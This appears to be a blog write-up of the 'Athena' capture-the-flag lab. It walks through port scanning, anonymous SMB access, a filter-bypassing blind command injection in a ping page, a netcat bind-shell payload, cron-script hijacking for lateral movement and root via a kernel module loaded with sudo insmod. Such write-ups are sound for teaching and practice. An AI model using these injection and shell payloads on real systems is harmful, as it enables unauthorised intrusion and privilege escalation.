Post

Athena

Athena

Athena

🔍 Nmap Scan

🕵️ First, I ran a full port scan to discover open services:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Nmap scan report for ip-10-80-186-138.eu-west-1.compute.internal (10.80.186.138)
Host is up (0.00011s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3b:c8:f8:13:e0:cb:42:60:0d:f6:4c:dc:55:d8:3b:ed (RSA)
|   256 1f:42:e1:c3:a5:17:2a:38:69:3e:9b:73:6d:cd:56:33 (ECDSA)
|_  256 7a:67:59:8d:37:c5:67:29:e8:53:e8:1e:df:b0:c7:1e (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Athena - Gods of olympus
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have SSH, HTTP, and SMB open. Let’s start with the web server: Pasted image 20260624210805.png

Nothing interesting on the main page. Let’s dig deeper: Pasted image 20260624210844.png

💡 Still nothing useful on the web side — let’s move on to SMB.

📂 SMB Enumeration

I connected to the public SMB share anonymously:

1
smbclient //10.80.186.138/public -N

Pasted image 20260624211222.png

I found a file. Let’s grab it:

1
get msg_for_administrator.txt

Pasted image 20260624211427.png

Reading the file reveals a path — and interestingly, the intern mentioned is Athena: Pasted image 20260624211534.png

⚡ Command Injection & Blind Shell

🕵️ The path from the note points to a ping utility page. Let’s try to get a reverse shell through it: Pasted image 20260624211752.png

The command goes through: Pasted image 20260624211858.png

But other payloads are being filtered: Pasted image 20260624212036.png

💡 After some research, I found a way to bypass the filter using command substitution:

1
127.0.0.1 -c1$(sleep 5)

Sending this caused the page to hang for 5+ seconds — confirming blind command injection! The usual reverse shell didn’t work due to the filters, so I tried a blind netcat shell instead:

1
127.0.0.1 -c1$(nc -nlvp 4444 -e /bin/sh)

Pasted image 20260624215026.png

And it worked! Pasted image 20260624215214.png

💻 Let’s stabilize the shell:

1
python3 -c 'import pty;pty.spawn("/bin/bash");'
1
export TERM=xterm
1
^Z  // CTRL+Z
1
stty raw -echo; fg

Pasted image 20260624215526.png

We’re in as www-data. Now we need to move laterally to the athena user to get the flag.

🔐 Lateral Movement — www-data → athena

I uploaded pspy64 to monitor running processes without root:

https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

Pasted image 20260624221006.png

Pasted image 20260624221153.png

⚡ A cronjob is running as athena! Let’s look at the script it executes: Pasted image 20260624221403.png

We can write to it — let’s inject a reverse shell: Pasted image 20260624221706.png

After a short wait, the cronjob fires and we get a shell as athena: Pasted image 20260624221750.png

Let’s stabilize this shell too, and grab the user flag: Pasted image 20260624221931.png

🏆 Privilege Escalation — athena → root

Checking sudo privileges: Pasted image 20260624222113.png

We can run:

1
/usr/sbin/insmod /mnt/.../secret/venom.ko

💡 insmod loads a kernel module. I grabbed the venom.ko file to examine it — even though I can’t delete or modify it: Pasted image 20260624222202.png

Pasted image 20260624222630.png

Let’s examine the kernel module: Pasted image 20260624224001.png

🕵️ It contains a give_root function. I used AI to help craft the exploit, and after loading the module with insmod, it worked: Pasted image 20260624223107.png

🏁 Root flag obtained!

This post is licensed under CC BY 4.0 by the author.